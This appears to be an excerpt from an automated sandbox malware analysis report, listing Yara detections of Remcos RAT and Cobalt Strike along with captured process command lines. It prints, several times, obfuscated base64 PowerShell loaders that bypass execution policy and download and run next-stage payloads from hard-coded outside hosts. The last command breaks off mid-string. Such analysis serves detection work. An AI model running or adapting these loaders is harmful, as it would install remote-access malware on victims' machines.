Source: Yara match	File source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0041BB87 SystemParametersInfoW,

12_2_0041BB87

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2